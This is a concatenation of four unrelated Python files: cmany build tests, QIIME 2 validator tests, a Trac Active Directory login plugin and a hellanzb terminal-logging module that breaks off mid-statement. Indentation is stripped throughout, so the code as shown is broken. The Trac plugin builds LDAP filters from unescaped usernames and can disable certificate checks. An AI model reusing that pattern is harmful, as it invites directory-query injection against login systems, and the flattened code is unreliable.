tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=c, build_type=t, variant=v,
numbuilds=numbuilds)
check_fn(tb)
#
# run all sys,arch,compiler,buildtype,variant combinations at once - envargs
bd = '.test/2.2--comps{}--types{}--variants{}--build'.format(len(compiler_set), len(build_types), len(variant_set))
id = '.test/2.2--comps{}--types{}--variants{}--install'.format(len(compiler_set), len(build_types), len(variant_set))
for p in projs:
with testobj.subTest(msg="run all combinations at once", proj=p.proj):
os.environ['CMANY_ARGS'] = '-c {} -t {} -v {}'.format(
','.join([c.name if c.is_msvc else c.path for c in compiler_set]),
','.join([str(b) for b in build_types]),
','.join([v.full_specs for v in variant_set])
)
#util.logwarn('export CMANY_ARGS={}'.format(os.environ['CMANY_ARGS']))
p.run(args + ['--build-dir', bd,
'--install-dir', id,
])
os.environ['CMANY_ARGS'] = ''
if check_fn:
for c in compiler_set:
for t in build_types:
for v in variant_set:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=c, build_type=t, variant=v,
numbuilds=numbuilds)
check_fn(tb)
#
# run sys,arch,compiler,buildtype combinations individually
for p in projs:
for c in compiler_set:
for t in build_types:
for v in variant_set:
with testobj.subTest(msg="run all combinations individually",
proj=p.proj, compiler=c, build_type=t, variant=v):
bd = '.test/3.1--{}--{}--{}--build'.format(c, t, v.name)
id = '.test/3.1--{}--{}--{}--install'.format(c, t, v.name)
p.run(args + ['--build-dir', bd,
'--install-dir', id,
'-c', c.name if c.is_msvc else c.path,
'-t', str(t),
'-v', v.full_specs,
])
if check_fn:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=c, build_type=t, variant=v,
numbuilds=1)
check_fn(tb)
#
# run sys,arch,compiler,buildtype combinations individually - envargs
for p in projs:
for c in compiler_set:
for t in build_types:
for v in variant_set:
with testobj.subTest(msg="run all combinations individually - envargs",
proj=p.proj, compiler=c, build_type=t, variant=v):
bd = '.test/3.2--envargs--{}--{}--{}--build'.format(c, t, v.name)
id = '.test/3.2--envargs--{}--{}--{}--install'.format(c, t, v.name)
os.environ['CMANY_ARGS'] = '-c {} -t {} -v {}'.format(
c.name if c.is_msvc else c.path,
str(t),
v.full_specs)
#util.logwarn('export CMANY_ARGS={}'.format(os.environ['CMANY_ARGS']))
p.run(args + ['--build-dir', bd, '--install-dir', id])
os.environ['CMANY_ARGS'] = ''
if check_fn:
tb = TestBuild(proj=p, buildroot=bd, installroot=id,
compiler=c, build_type=t, variant=v,
numbuilds=1)
check_fn(tb)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class TestBuild:
def __init__(self, proj, buildroot, installroot, compiler, build_type, variant, numbuilds):
self.proj = proj
self.buildroot = buildroot
self.installroot = installroot
self.compiler = compiler
self.build_type = build_type
self.variant = variant
self.numbuilds = numbuilds
self.flags = cmany.BuildFlags('all_builds')
self.build_obj = cmany.Build(proj_root=self.proj.root,
build_root=os.path.join(self.proj.root, self.buildroot),
install_root=os.path.join(self.proj.root, self.installroot),
system=cmany.System.default(),
arch=cmany.Architecture.default(),
build_type=build_type,
compiler=compiler,
variant=variant,
flags=self.flags,
num_jobs=cpu_count(),
kwargs={}
)
def checkc(self, tester):
tester.assertEqual(self.nsiblings(self.buildroot), self.numbuilds, msg=self.buildroot + str(self.siblings(self.buildroot)))
build_type = cmake.getcachevar(self.build_obj.builddir, 'CMAKE_BUILD_TYPE')
tester.assertEqual(build_type, str(self.build_type))
def checkv(self, tester):
pass
def checkb(self, tester):
self.checkc(tester)
def checki(self, tester):
tester.assertEqual(self.nsiblings(self.installroot), self.numbuilds)
def nsiblings(self, dir):
return len(self.siblings(dir))
def siblings(self, dir):
res = os.path.join(self.proj.root, dir, '*')
ch = glob.glob(res)
return ch
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Outputs(dict):
"a class to store several outputs which should be the same"
def add_one(self, k, kk, vv):
l = self.get(k)
if l is None:
l = []
self[k] = l
l.append((kk, vv))
def compare_outputs(self, test):
for k, outs in self.items():
rk, rv = outs[0]
rv = self._filter_output(rv)
for kk, vv in outs[1:]:
vv = self._filter_output(vv)
test.assertEqual(rv, vv, "{}: refkey: '{}' vs key '{}'".format(k, rk, kk))
def _filter_output(self, s):
# the first three lines contain the command, so skip them
out = "\n".join(s.split("\n")[3:])
return out
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Test00Help(ut.TestCase):
# TODO: grab the output and compare it to make sure it is the same
def setUp(self):
super().setUp()
self.maxDiff = None
# make sure --show-args is not used to projs.run()
global maincmd
self.maincmd = maincmd
maincmd = [c for c in maincmd if c != '--show-args']
def tearDown(self):
super().tearDown()
global maincmd
maincmd = self.maincmd
cmany_help = Outputs()
def test00_cmany_help_short(self):
out = projs[0].run(['-h'])
__class__.cmany_help.add_one('-h', '-h', out)
def test01_cmany_help_long(self):
out = projs[0].run(['--help'])
__class__.cmany_help.add_one('-h', '--help', out)
def test0x_cmany_help_compare(self):
__class__.cmany_help.compare_outputs(self)
sc_help_short = Outputs()
def test10_subcommand_help_short(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
out = projs[0].run([c, '-h'])
__class__.sc_help_short.add_one(c, c, out)
def test11_subcommand_help_short_aliases(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
for a in aliases:
out = projs[0].run([a, '-h'])
__class__.sc_help_short.add_one(c, a, out)
def test1x_subcommand_help_compare(self):
__class__.sc_help_short.compare_outputs(self)
sc_help_short_rev = Outputs()
def test20_subcommand_help_short_rev(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
out = projs[0].run(['h', c])
__class__.sc_help_short_rev.add_one(c, c, out)
def test21_subcommand_help_short_rev_aliases(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
for a in aliases:
out = projs[0].run(['h', a])
__class__.sc_help_short_rev.add_one(c, a, out)
def test2x_subcommand_help_compare(self):
__class__.sc_help_short_rev.compare_outputs(self)
sc_help_long = Outputs()
def test30_subcommand_help_long(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
out = projs[0].run([c, '--help'])
__class__.sc_help_long.add_one(c, c, out)
def test31_subcommand_help_long_aliases(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
for a in aliases:
out = projs[0].run([a, '--help'])
__class__.sc_help_long.add_one(c, a, out)
def test3x_subcommand_help_long_compare(self):
__class__.sc_help_long.compare_outputs(self)
sc_help_long_rev = Outputs()
def test40_subcommand_help_long_rev(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
out = projs[0].run(['help', c])
__class__.sc_help_long_rev.add_one(c, c, out)
def test41_subcommand_help_long_rev_aliases(self):
for c, aliases in main.cmds.items():
if c == 'help': continue
for a in aliases:
out = projs[0].run(['help', a])
__class__.sc_help_long_rev.add_one(c, a, out)
def test4x_subcommand_help_long_compare(self):
__class__.sc_help_long_rev.compare_outputs(self)
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Test01Configure(ut.TestCase):
def test00_default(self):
run_projs(self, ['c'], lambda tb: tb.checkc(self))
def test01_custom_dirs(self):
run_projs(self, ['c'], lambda tb: tb.checkc(self))
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Test02Build(ut.TestCase):
def test00_default(self):
run_projs(self, ['b'], lambda tb: tb.checkb(self))
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class Test03Install(ut.TestCase):
def test00_default(self):
run_projs(self, ['i'], lambda tb: tb.checki(self))
class Test04Dependencies(ut.TestCase):
pass
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
if __name__ == '__main__':
ut.main()
|
|
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2022, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from qiime2.core.exceptions import ValidationError, ImplementationError
import unittest
from qiime2.core.validate import ValidationObject
from qiime2.sdk import PluginManager
from qiime2.plugin.plugin import ValidatorRecord, Plugin
from qiime2.core.testing.type import (IntSequence1, AscIntSequence,
Kennel, Dog, Squid, Octopus)
from qiime2.core.testing.format import IntSequenceFormat, Cephalapod
class TestValidationObject(unittest.TestCase):
def setUp(self):
self.simple_int_seq = IntSequenceFormat()
with self.simple_int_seq.open() as fh:
fh.write('\n'.join(map(str, range(3))))
self.simple_int_seq.validate(level='max')
def test_initialization(self):
validator_object = ValidationObject(IntSequence1)
self.assertEqual(validator_object.concrete_type, IntSequence1)
def test_add_validator(self):
def test_validator_method(data: list, level):
pass
test_record = ValidatorRecord(validator=test_validator_method,
view=list, plugin='this_plugin',
context=IntSequence1)
validator_object = ValidationObject(IntSequence1)
validator_object.add_validator(test_record)
self.assertEqual(validator_object._validators,
[test_record])
def test_add_validation_object(self):
first_VO = ValidationObject(IntSequence1)
second_VO = ValidationObject(IntSequence1)
def first_validator(data: list, level):
pass
def second_validator(data: list, level):
pass
first_record = ValidatorRecord(validator=first_validator,
view=list, plugin='this_plugin',
context=IntSequence1)
second_record = ValidatorRecord(validator=second_validator,
view=list, plugin='this_plugin',
context=IntSequence1)
first_VO.add_validator(first_record)
second_VO.add_validator(second_record)
# Allows us to demonstrate add_validation_object sets _is_sorted to
# false
first_VO._sort_validators()
first_VO.add_validation_object(second_VO)
self.assertEqual(first_VO._validators, [first_record, second_record])
self.assertFalse(first_VO._is_sorted)
def test_catch_different_concrete_types(self):
squid_vo = ValidationObject(Squid)
octopus_vo = ValidationObject(Octopus)
def squid_validator(data: Cephalapod, level):
pass
def octopus_validator(data: Cephalapod, level):
pass
squid_record = ValidatorRecord(validator=squid_validator,
view=Cephalapod,
plugin='ocean_plugin',
context=Squid)
octopus_record = ValidatorRecord(validator=octopus_validator,
view=Cephalapod,
plugin='sea_plugin',
context=Octopus)
squid_vo.add_validator(squid_record)
octopus_vo.add_validator(octopus_record)
with self.assertRaisesRegex(TypeError, "Unable to add"):
squid_vo.add_validation_object(octopus_vo)
def test_public_validators_generation(self):
validator_object = ValidationObject(IntSequence1)
def first_validator(data: list, level):
pass
def second_validator(data: list, level):
pass
first_record = ValidatorRecord(validator=first_validator,
view=list, plugin='this_plugin',
context=IntSequence1)
second_record = ValidatorRecord(validator=second_validator,
view=list, plugin='this_plugin',
context=IntSequence1)
validator_object.add_validator(first_record)
validator_object.add_validator(second_record)
self.assertEqual(validator_object.validators,
[first_record, second_record])
self.assertTrue(validator_object._is_sorted)
def test_run_validators(self):
validator_object = ValidationObject(IntSequence1)
has_run = False
def test_validator_method(data: list, level):
nonlocal has_run
has_run = True
self.assertEqual(data, [0, 1, 2])
self.assertEqual(level, 'max')
test_record = ValidatorRecord(validator=test_validator_method,
view=list, plugin='this_plugin',
context=IntSequence1)
validator_object.add_validator(test_record)
validator_object(self.simple_int_seq, level='max')
self.assertTrue(has_run)
def test_run_validators_validation_exception(self):
validator_object = ValidationObject(AscIntSequence)
def test_raising_validation_exception(data: list, level):
raise ValidationError("2021-08-24")
test_record = ValidatorRecord(
validator=test_raising_validation_exception,
view=list, plugin='this_plugin',
context=AscIntSequence)
validator_object.add_validator(test_record)
with self.assertRaisesRegex(ValidationError,
"2021-08-24"):
validator_object(data=[], level=None)
def test_run_validators_unknown_exception(self):
validator_object = ValidationObject(AscIntSequence)
def test_raising_validation_exception(data: list, level):
raise KeyError("2021-08-24")
test_record = ValidatorRecord(
validator=test_raising_validation_exception,
view=list, plugin='this_plugin',
context=AscIntSequence)
validator_object.add_validator(test_record)
with self.assertRaisesRegex(ImplementationError,
"attempted to validate"):
validator_object(data=[], level=None)
def test_validator_sorts(self):
self.pm = PluginManager()
test_object = self.pm.validators[Squid]
self.assertFalse(test_object._is_sorted)
exp = ['validator_sort_first',
'validator_sort_middle',
'validator_sort_middle_b',
'validator_sort_last']
exp2 = ['validator_sort_first',
'validator_sort_middle_b',
'validator_sort_middle',
'validator_sort_last']
obs = [record.validator.__name__ for record in test_object.validators]
self.assertIn(obs, [exp, exp2])
self.assertTrue(test_object._is_sorted)
class TestValidatorIntegration(unittest.TestCase):
def setUp(self):
# setup test plugin
self.test_plugin = Plugin(name='validator_test_plugin',
version='0.0.1',
website='test.com',
package='qiime2.core.tests',
project_name='validator_test')
self.pm = PluginManager()
# setup test data
self.simple_int_seq = IntSequenceFormat()
with self.simple_int_seq.open() as fh:
fh.write('\n'.join(map(str, range(3))))
self.simple_int_seq.validate(level='max')
def tearDown(self):
# This is a deadman switch to ensure that the test_plugin has been
# added
self.assertIn(self.test_plugin.name, self.pm.plugins)
self.pm.forget_singleton()
def test_validator_from_each_type_in_expression(self):
@self.test_plugin.register_validator(IntSequence1 | AscIntSequence)
def blank_validator(data: list, level):
pass
self.pm.add_plugin(self.test_plugin)
def test_no_transformer_available(self):
@self.test_plugin.register_validator(IntSequence1 | Kennel[Dog])
def blank_validator(data: list, level):
pass
with self.assertRaisesRegex(
AssertionError,
r"Kennel\[Dog\].*blank_validator.*transform.*builtins:list"):
self.pm.add_plugin(self.test_plugin)
class TestValidatorRegistration(unittest.TestCase):
def setUp(self):
self.test_plugin = Plugin(name='validator_test_plugin',
version='0.0.1',
website='test.com',
package='qiime2.core.tests',
project_name='validator_test')
def test_catch_missing_validator_arg(self):
run_checker = False
with self.assertRaisesRegex(TypeError, "does not contain the"
" required arguments"):
run_checker = True
@self.test_plugin.register_validator(IntSequence1)
def validator_missing_level(data: list):
pass
assert run_checker
def test_catch_extra_validator_arg(self):
run_checker = False
with self.assertRaisesRegex(TypeError, "does not contain the"
" required arguments"):
run_checker = True
@self.test_plugin.register_validator(IntSequence1)
def validator_extra_arg(data: list, level, spleen):
pass
assert run_checker
def test_catch_no_data_annotation_in_validator(self):
run_checker = False
with self.assertRaisesRegex(TypeError, "No expected view type"
" provided as annotation for `data`"
" variable"):
run_checker = True
@self.test_plugin.register_validator(IntSequence1)
def validator_no_view_annotation(data, level):
pass
assert run_checker
|
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 John Hampton <pacopablo@pacopablo.com>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# Author: John Hampton <pacopablo@pacopablo.com>
from trac.core import *
from trac.config import Option
import ldap
import time
from acct_mgr.api import IPasswordStore
from tracext.adauth.api import IPermissionUserProvider
__all__ = ['ADAuthStore']
class ADAuthStore(Component):
"""AD Password Store for Account Manager """
implements(IPasswordStore, IPermissionUserProvider)
ads = Option('account-manager', 'ad_server', 'localhost', 'Address of the Active Directory Server')
base_dn = Option('account-manager', 'base_dn', None, 'Base DN used for account searches')
bind_dn = Option('account-manager', 'bind_dn', None, 'DN used to bind to Active Directory')
bind_pw = Option('account-manager', 'bind_passwd', None, 'Password used when binding to Active Directory')
auth_group = Option('account-manager', 'auth_group', None, 'DN of group containing valid users. If None, any AD user is valid')
admin_group = Option('account-manager', 'admin_group', None, 'DN of group containing TRAC_ADMIN users')
customcacert = Option('account-manager', 'custom_cacertfile', None, 'Path of custom CACERTFILE for ldaps')
ignoreunknowncertificate = False
def __init__(self):
self.ignoreunknowncertificate = self.env.config.getbool('account-manager', 'ignoreunknowncertificate')
# IPasswordStore
def config_key(self):
"""Deprecated"""
def get_users(self, populate_session=True):
"""Grab a list of users from Active Directory"""
lcnx = self._bind_ad()
if lcnx:
if self.auth_group:
userinfo = self.expand_group_users(lcnx, self.auth_group)
else:
users = lcnx.search_s(self.base_dn, ldap.SCOPE_SUBTREE,
"objectCategory=person",
['sAMAccountName', 'mail',
'proxyAddresses', 'displayName'])
userinfo = [self._get_userinfo(u[1]) for u in users]
else:
raise TracError('Unable to bind to Active Directory')
if populate_session:
self._populate_user_session(userinfo)
return [u[0] for u in userinfo]
def expand_group_users(self, cnx, group):
"""Given a group name, enumerate all members"""
g = cnx.search_s(group, ldap.SCOPE_BASE, attrlist=['member'])
if g and g[0][1].has_key('member'):
users = []
for m in g[0][1]['member']:
e = cnx.search_s(m, ldap.SCOPE_BASE)
if e:
if 'person' in e[0][1]['objectClass']:
users.append(self._get_userinfo(e[0][1]))
elif 'group' in e[0][1]['objectClass']:
users.extend(self.expand_group_users(cnx, e[0][0]))
else:
self.log.debug('The group member (%s) is neither a group nor a person' % e[0][0])
else:
self.log.debug('Unable to find user listed in group: %s' % str(m))
self.log.debug('This is very strange and you should probably check '
'the consistency of your LDAP directory.' % str(m))
return users
else:
self.log.debug('Unable to find any members of the group %s' % group)
return []
def has_user(self, user):
users = self.get_users()
return user.lower() in users
def check_password(self, user, password):
"""Checks the password against LDAP"""
dn = self._get_user_dn(user)
success = None
msg = "User Login: %s" % str(user)
if dn:
success = self._bind_ad(dn, password) or False
if success:
msg += " Password Verified"
success = True
elif success is False:
msg += " Password Failed"
else:
msg += " does not exist in AD, deferring authentication"
self.log.debug(msg)
return success
def delete_user(self, user):
"""Can't delete from LDAP"""
self.log.debug("Can not delete users from Active Directory")
return False
# IPermissionUserProvider
def get_permission_action(self, username):
""" Return TRAC_ADMIN if user is in the self.admin_group """
cnx = self._bind_ad()
if cnx and self.admin_group:
users = [u[0] for u in self.expand_group_users(cnx, self.admin_group)]
if username in users:
return ['TRAC_ADMIN']
return []
# Internal methods
def _bind_ad(self, user_dn=None, passwd=None):
user = user_dn or self.bind_dn
password = passwd or self.bind_pw
if not self.ads.lower().startswith('ldap://') and not self.ads.lower().startswith('ldaps://'):
ads = 'ldap://%s' % self.ads
else:
ads = self.ads
try:
#ldaps support
if ads.lower().startswith('ldaps://'):
if self.ignoreunknowncertificate == True:
self.log.debug('ignoring unknown certs...')
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
if self.customcacert:
self.log.debug('adding custom cacertfile: %s' % self.customcacert)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,self.customcacert)
l = ldap.initialize(ads)
l.set_option(ldap.OPT_REFERRALS, 0)
except:
raise TracError('Unable to contact Active Directory >>>%s<<<' % ads)
if not user:
raise TracError('The bind_dn ini option must be set')
if not password:
raise TracError('The bind_pw ini option must be set')
try:
l.simple_bind_s(user, password)
except Exception, e:
self.log.debug('Unable to bind to Active Directory', exc_info=e)
return None
return l
def _get_user_dn(self, user):
if self.has_user(user):
lcnx = self._bind_ad()
if lcnx:
try:
u = lcnx.search_s(self.base_dn, ldap.SCOPE_SUBTREE, "(&(objectCategory=person)(sAMAccountName=%s))" % user, ['sAMAccountName'])
return u[0][0]
except Exception, e:
self.log.debug('user not found: %s' % user, exc_info=e)
return None
else:
raise TracError('Unable to bind to Active Directory')
return None
def _get_userinfo(self, attrs):
""" Extract the userinfo tuple from the LDAP search result """
username = attrs['sAMAccountName'][0].lower()
displayname = attrs.get('displayName', [''])[0]
email = ''
if 'mail' in attrs:
email = attrs['mail'][0].lower()
elif 'proxyAddresses' in attrs:
for e in attrs['proxyAddress']:
if e.startswith('SMTP:'):
email = e[5:]
continue
return (username, displayname, email)
def _populate_user_session(self, userinfo):
""" Create user session entries and populate email and last visit """
# Kind of ugly. First try to insert a new session record. If it
# fails, don't worry, means it's already there. Second, insert the
# email address session attribute. If it fails, don't worry, it's
# already there.
cnx = self.env.get_db_cnx()
lastvisit = 0
for uname, displayname, email in userinfo:
try:
cur = cnx.cursor()
cur.execute('INSERT INTO session (sid, authenticated, '
'last_visit) VALUES (%s, 1, %s)',
(uname, lastvisit))
cnx.commit()
except:
cnx.rollback()
if email:
try:
cur = cnx.cursor()
cur.execute("INSERT INTO session_attribute"
" (sid, authenticated, name, value)"
" VALUES (%s, 1, 'email', %s)",
(uname, email))
cnx.commit()
except:
cnx.rollback()
if displayname:
try:
cur = cnx.cursor()
cur.execute("INSERT INTO session_attribute"
" (sid, authenticated, name, value)"
" VALUES (%s, 1, 'name', %s)",
(uname, displayname))
cnx.commit()
except:
cnx.rollback()
continue
cnx.close()
|
|
"""
Logging - hellanzb's logging facility. Ties in with python's logging system, with an added
SCROLL log level.
The NZBLeecherTicker object will constantly print new and kill it's old lines of text on
the screen via the scroll() level. This busys the screen, but the SCROLL level hooks allow
normal logging of non-SCROLL log messages by passing those non-SCROLL messages to
NZBLeecherTicker to be handled specially (printed above the scrolling text). This special
handling is only enabled when SCROLL has been turned on (via scrollBegin())
(c) Copyright 2005 Philip Jenvey
[See end of file]
"""
import heapq, logging, os, sys, thread, types
try:
import termios
except ImportError:
termios = None
from logging import StreamHandler
from logging.handlers import RotatingFileHandler
from threading import Condition, Lock, RLock, Thread
from twisted.internet import reactor
from twisted.python import reflect, util
from twisted.python.log import startLoggingWithObserver, FileLogObserver
from Hellanzb.Util import *
__id__ = '$Id$'
class StreamHandlerNoLF(StreamHandler):
""" A StreamHandler that doesn't append \n to every message logged to it """
def emit(self, record):
""" Cut/Pastse of StreamHandler's emit to not append messages with \n """
try:
msg = self.format(record)
if not hasattr(types, "UnicodeType"): #if no unicode support...
self.stream.write("%s" % msg)
else:
try:
self.stream.write("%s" % msg)
except UnicodeError:
self.stream.write("%s" % msg.encode("UTF-8"))
self.flush()
except:
self.handleError(record)
class RotatingFileHandlerNoLF(RotatingFileHandler, StreamHandlerNoLF):
""" A RotatingFileHandler that doesn't append \n to every message logged to it """
def emit(self, record):
""" Cut/Pastse of RotatingFileHandler's emit to not append messages with \n """
if self.maxBytes > 0: # are we rolling over?
msg = "%s" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
self.doRollover()
StreamHandlerNoLF.emit(self, record)
class ScrollableHandler(StreamHandlerNoLF):
""" ScrollableHandler is a StreamHandler that specially handles scrolling (log
messages at the SCROLL level). It allows you to temporarily interrupt the constant
scroll with other log messages of different levels (printed at the top of the scroll
area) """
# the SCROLL level (a class var)
LOGFILE = 11
SCROLL = 12
SHUTDOWN = 13
NOLOGFILE = 14
def __init__(self, *args, **kwargs):
self.scrollLock = RLock()
self.scrollFlag = False
StreamHandlerNoLF.__init__(self, *args, **kwargs)
def handle(self, record):
""" The 'scroll' level is a constant scroll that can be interrupted. This interruption is
done via prepending text to the scroll area """
rv = self.filter(record)
if rv:
if record.levelno == ScrollableHandler.SCROLL:
self.emitSynchronized(record)
elif record.levelno == ScrollableHandler.SHUTDOWN:
record.msg = '\n\n\n%s\n' % record.msg
self.emitSynchronized(record)
else:
self.scrollLock.acquire()
# If scroll is on, interrupt scroll
if ScrollableHandler.scrollFlag:
self.scrollHeader(record)
else:
# otherwise if scroll isn't on, just log the message normally
self.emitSynchronized(record)
self.scrollLock.release()
return rv
def emitSynchronized(self, record):
""" Write a log message atomically. Normal python logging Handler behavior """
self.acquire()
try:
self.emit(record)
finally:
self.release()
def scrollHeader(self, record):
""" Print a log message so that the user can see it during a SCROLL """
msg = self.format(record).rstrip() # Scroller appends newline for us
from twisted.internet import reactor
if inMainThread():
# FIXME: scrollBegin() should really be creating the scroller instance
# FIXME: no unicode crap from normal python log emit
Hellanzb.scroller.scrollHeader(msg)
else:
reactor.callFromThread(Hellanzb.scroller.scrollHeader, msg)
class RecentLogEntries:
""" A FIFO queue that maintains the specified size by popping off the least recently added
item """
def __init__(self, size):
self.size = size
self.logEntries = []
def append(self, level, logEntry):
if len(self.logEntries) >= self.size:
self.logEntries.pop(0)
self.logEntries.append((level, logEntry))
def __iter__(self):
entriesLen = len(self.logEntries)
i = 0
while i < entriesLen:
yield self.logEntries[i]
i += 1
class LogOutputStream:
""" Provides somewhat of a file-like interface (supporting only the typical writing
functions) to the specified logging function """
def __init__(self, logFunction):
self.write = logFunction
def flush(self): pass
def close(self): pass
def isatty(self): raise NotImplementedError()
def next(self): raise NotImplementedError()
def read(self, n = -1): raise NotImplementedError()
def readline(self, length = None): raise NotImplementedError()
def readlines(self, sizehint = 0): raise NotImplementedError()
def seek(self, pos, mode = 0): raise NotImplementedError()
def tell(self): raise NotImplementedError()
def truncate(self, size = None): raise NotImplementedError()
def writelines(self, list): raise NotImplementedError()
class ANSICodes(object):
# f/b_ = fore/background
# d/l/b = dark/light/bright
map = {
'ESCAPE': '\033',
'RESET': '0',
'KILL_LINE': 'K',
'F_DRED': '31',
'F_LRED': '31;1',
'F_DGREEN': '32',
'F_LGREEN': '32;1',
'F_BROWN': '33',
'F_YELLOW': '33;1',
'F_DBLUE': '34',
'F_LBLUE': '34;1',
'F_DMAGENTA': '35',
'F_LMAGENTA': '35;1',
'F_DCYAN': '36',
'F_LCYAN': '36;1',
'F_WHITE': '37',
'F_BWHITE': '37;1',
}
def __init__(self):
for key, val in self.map.iteritems():
if Hellanzb.DISABLE_ANSI:
code = ''
else:
code = self.code(key)
self.__dict__[key] = code
def code(self, name):
val = self.map[name]
if name != 'ESCAPE':
val = '%s[%s' % (self.map['ESCAPE'], val)
if name != 'KILL_LINE':
val = '%sm' % val
return val
def moveUp(self, count):
""" Return ANSI codes to move the cursor up count lines """
return not Hellanzb.DISABLE_ANSI and '\r\033[%iA' % count or ''
class HellaTwistedLogObserver(FileLogObserver):
""" Custom twisted LogObserver. It emits twisted log entries to the debug log
function, unless they are failures (Exceptions), which are emited to the error log
function """
def __init__(self):
from Hellanzb.Log import error, debug
self.error = error
self.debug = debug
def emit(self, eventDict):
isFailure = False
edm = eventDict['message']
if not edm:
if eventDict['isError'] and eventDict.has_key('failure'):
isFailure = True
text = ((eventDict.get('why') or 'Unhandled Error')
+ '\n' + eventDict['failure'].getTraceback())
elif eventDict.has_key('format'):
text = self._safeFormat(eventDict['format'], eventDict)
else:
# we don't know how to log this
return
else:
text = ' '.join(map(reflect.safe_str, edm))
fmtDict = {'system': eventDict['system'], 'text': text}
msgStr = self._safeFormat("[%(system)s] %(text)s\n", fmtDict)
util.untilConcludes(self.debug, msgStr, appendLF=False)
if isFailure:
util.untilConcludes(self.error, msgStr, appendLF=False)
__call__ = emit
NEWLINE_RE = re.compile('\n')
class NZBLeecherTicker:
""" A basic logger for NZBLeecher. It's uh, not what I really want. I'd rather put more
time into writing a curses interface. Code submissions greatly appreciated. -pjenvey
"""
def __init__(self):
self.size = 0
self.segments = []
self.connectionCounts = {}
self.currentLog = None
self.maxCount = 0 # FIXME: var name
ACODE = Hellanzb.ACODE
self.connectionPrefix = ACODE.F_DBLUE + '[' + ACODE.RESET + '%s' + \
ACODE.F_DBLUE + ']' + ACODE.RESET
self.scrollHeaders = []
self.started = False
self.killedHistory = False
from Hellanzb.Log import scroll
self.logger = scroll
def addClient(self, segment, color):
""" Add a client (it's segment) to the ticker, to log with the specified ascii color code """
heapq.heappush(self.segments, (segment.priority, segment, color))
def removeClient(self, segment, color):
""" Remove a client (it's segment) from the ticker """
self.segments.remove((segment.priority, segment, color))
def setConnectionCount(self, color, count):
""" Set the number of connections for the particular color """
if color not in self.connectionCounts:
self.connectionCounts[color] = count
else:
self.connectionCounts[color] += count
def scrollHeader(self, message):
# Even if passed multiple lines, ensure all lines are max 80 chars
lines = message.split('\n')
for line in lines:
line = truncateToMultiLine(line, length = 80).expandtabs()
self.scrollHeaders.append(line)
if Hellanzb.SHUTDOWN:
return
self.updateLog()
def killHistory(self):
""" clear scroll off the screen """
if not self.killedHistory and self.started:
msg = Hellanzb.ACODE.moveUp(self.maxCount + 1)
for i in range(self.maxCount + 1):
msg = '%s\n%s' % (msg, Hellanzb.ACODE.KILL_LINE)
msg = '%s%s' % (msg, Hellanzb.ACODE.moveUp(self.maxCount + 1))
if not Hellanzb.DAEMONIZE:
self.logger(msg)
self.killedHistory = True
self.started = False
# segments should be empty at this point anyway
self.segments = []
# FIXME: probably doesn't matter much, but should be using StringIO for concatenation
# here, anyway
def updateLog(self):
""" Log ticker """
if Hellanzb.DAEMONIZE or Hellanzb.DISABLE_SCROLLER:
return
ACODE = Hellanzb.ACODE
if self.currentLog != None:
# Kill previous lines,
if Hellanzb.DISABLE_ANSI:
currentLog = '\n'
else:
currentLog = Hellanzb.ACODE.moveUp(self.maxCount)
else:
# unless we have just began logging. and in that case, explicitly log the
# first message
currentLog = ''
# Log information we want to prefix the scroll (so it stays on the screen)
if len(self.scrollHeaders) > 0:
scrollHeader = ''
for message in self.scrollHeaders:
message = NEWLINE_RE.sub(ACODE.KILL_LINE + '\n', message)
scrollHeader = '%s%s%s\n' % (scrollHeader, message, ACODE.KILL_LINE)
currentLog = '%s%s' % (currentLog, scrollHeader)
# listing sorted via heapq
heap = self.segments[:]
sortedSegments = []
colorCount = self.connectionCounts.copy()
try:
while True:
p, segment, color = heapq.heappop(heap)
colorCount[color] -= 1
sortedSegments.append((segment, color))
except IndexError:
pass
lastSegment = None
i = 0
for segment, color in sortedSegments:
i += 1
if self.maxCount > 9:
prettyId = str(i).zfill(2)
else:
prettyId = str(i)
# Determine when we've just found the real file name, then use that as the
# show name
try:
if segment.nzbFile.showFilenameIsTemp == True and segment.nzbFile.filename != None:
segment.nzbFile.showFilename = segment.nzbFile.filename
segment.nzbFile.showFilenameIsTemp = False
except AttributeError, ae:
from Hellanzb.Log import debug
debug('ATTRIBUTE ERROR: ' + str(ae) + ' num: ' + str(segment.number) + \
' duh: ' + str(segment.articleData))
pass
connectionPrefix = color + '[' + ACODE.RESET + '%s' + \
color + ']' + ACODE.RESET
prefix = connectionPrefix % prettyId
if lastSegment != None and lastSegment.nzbFile == segment.nzbFile:
# 57 line width -- approximately 80 - 5 (prefix) - 18 (max suffix)
currentLog = '%s%s %s%s' % (currentLog, prefix,
rtruncate(segment.nzbFile.showFilename,
length = 57), ACODE.KILL_LINE)
else:
currentLog = '%s%s %s - %s%2d%%%s%s @ %s%s%.1fKB/s%s' % \
